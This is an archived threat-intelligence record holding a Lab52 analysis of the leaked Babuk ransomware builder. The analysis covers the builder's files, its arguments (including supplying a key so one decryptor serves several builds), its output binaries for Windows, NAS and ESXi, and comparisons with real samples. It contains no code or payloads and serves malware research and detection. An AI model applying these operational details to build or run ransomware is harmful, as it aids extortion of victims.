{
	"id": "76eaa9b6-eb98-4dc6-bf6e-ac10f4781947",
	"created_at": "2026-04-06T01:31:47.016628Z",
	"updated_at": "2026-04-10T03:21:31.032867Z",
	"deleted_at": null,
	"sha1_hash": "b9c8d08902c118079db8579ea29e3b9d4c73634d",
	"title": "Quick review of Babuk ransomware builder",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 752776,
	"plain_text": "Quick review of Babuk ransomware builder\r\nPublished: 2021-07-05 · Archived: 2026-04-06 00:08:11 UTC\r\nLast week, the builder for the Babuk ransomware family was leaked online. Lab52 has obtained and analyzed this\r\nbuilder sample determining that it is very likely to be authentic.\r\nAfter their recent official move from Ransomware as a Service to data leaks extortions, someone uploaded to\r\nvirusTotal the ransomware builder for unknown reasons, and it was soon identified as such by British researcher\r\nKevin Beaumont.\r\nContent of Babuk builder leak\r\nWhat we first find is builder.exe, along with 2 other Windows executable files with .bin extension, 4 different\r\nUnix executables, and note.txt. At a first test, we could see how we have to tell builder.exe the output folder as an\r\nargument, and we noticed that the files generated were similar to the builder folder files.\r\nBabuk builder usage\r\nhttps://lab52.io/blog/quick-review-of-babuk-ransomware-builder/\r\nPage 1 of 6\n\nBabuk builder output\r\nAfter the successful execution, we get the two eliptic curve keys generated for encryption, 3 encryption\r\nexecutables for Windows, ARM-based NAS decives, and VMWare ESXi servers respectively, together with its\r\ncorresponding decryption executables.\r\nOne interesting thing that we found after these firsts test was that builder.exe would look for its files in the folder\r\nfrom where it is called, causing an error in case we want to execute builder.exe with an absolute path from a\r\ndifferent location, which could be considered a bug or, at least, a not so much elegant implementation.\r\nBabuk builder path bug\r\nWe decided to compare the Windows crypter executable with real samples uploaded to public sandboxes, and we\r\ncould first see useful information that was already suggesting that the builder could indeed be authentic.\r\nhttps://lab52.io/blog/quick-review-of-babuk-ransomware-builder/\r\nPage 2 of 6\n\nComparison between real Babuk sample and built sample\r\nWe also compared the encryption timing between two samples, getting similar times, which would be a\r\nreinforcement about its authenticity since Babuk is Top 3 fastest ransomware encryption speed since they updated\r\ntheir efficiency “flaws” identified by Chuong Dong during his great analysis of the three versions of Babuk. We\r\nwere also able to also identify that this was a builder for their last version.\r\nAs the final comparison to ensure the authenticity of the sample, we compared the assembly code of both files\r\nusing a plugin for IDA pro named Diaphora, and resulting to be almost identical.\r\nNot matching functions between real Babuk sample and built sample\r\nPartial matching functions real Babuk sample vs. built sample\r\nPerfect matching function from real Babuk sample vs. built sample\r\nAs it could be expected, the builder would take the content of note.txt and use it as the ransomware note that it\r\nwould be dropped in the infected machines. Since Babuk decided not to use any packing mechanism, we could\r\nhttps://lab52.io/blog/quick-review-of-babuk-ransomware-builder/\r\nPage 3 of 6\n\nalso spot in clear text the ransom note and the rest of the space reserved for the ransomware note inside the built\r\nbinaries.\r\nStrings of built sample\r\nHex content of built sample\r\nAfter this, we decided to take a deeper look into the actual builder executable, and we found out that we could\r\npass as a second argument an actual eliptic curve encyption key, instead of letting the builder generate it for us,\r\nallowing the ransomware operator to use the same decryption executable for different builds. Furthermore, it has\r\nbeen observed that, if no encyption key is specified as an argument, the key would be generated randomly.\r\nhttps://lab52.io/blog/quick-review-of-babuk-ransomware-builder/\r\nPage 4 of 6\n\nArgument parsing of Babuk builder\r\nIt could also be predictable that the builder would use the binary files as templates, and we could identify this\r\noperations within the assembly code, where it would first read the “template” file, modify it, and finally write the\r\nmodification as a new file in the specified folder.\r\nBabuk builder read of binary files as Templates\r\nhttps://lab52.io/blog/quick-review-of-babuk-ransomware-builder/\r\nPage 5 of 6\n\nBabuk builder write of output binary files\r\nSince Babuk binaries did not use any packer, anyone having these files and a deep knowledge about them, could\r\nhave written this builder. However, according to the compilation dates which seem legit, we do not think this is\r\nthe actual scenario.\r\nAbout the decrypter, we have not analyzed its code, but during the tests we realized that it does not contain the\r\neliptic curve keys hardcoded, therefore it needs to be run from a command prompt located in the same folder than\r\nthese generated keys. We could also identify that it works, but it takes a ridiculous amount of time to decrypt go\r\nthrough the whole disk and decrypt all the files.\r\nThis could be considered important since new ransomware gangs could try to take advantage of this leak for their\r\nown Raas “startup”. However, it is also valuable for researchers since it will allow us to generate better detection\r\nrules, or even track new unofficial variations of the ransomware family.\r\nSource: https://lab52.io/blog/quick-review-of-babuk-ransomware-builder/\r\nhttps://lab52.io/blog/quick-review-of-babuk-ransomware-builder/\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://lab52.io/blog/quick-review-of-babuk-ransomware-builder/"
	],
	"report_names": [
		"quick-review-of-babuk-ransomware-builder"
	],
	"threat_actors": [],
	"ts_created_at": 1775439107,
	"ts_updated_at": 1775791291,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b9c8d08902c118079db8579ea29e3b9d4c73634d.pdf",
		"text": "https://archive.orkl.eu/b9c8d08902c118079db8579ea29e3b9d4c73634d.txt",
		"img": "https://archive.orkl.eu/b9c8d08902c118079db8579ea29e3b9d4c73634d.jpg"
	}
}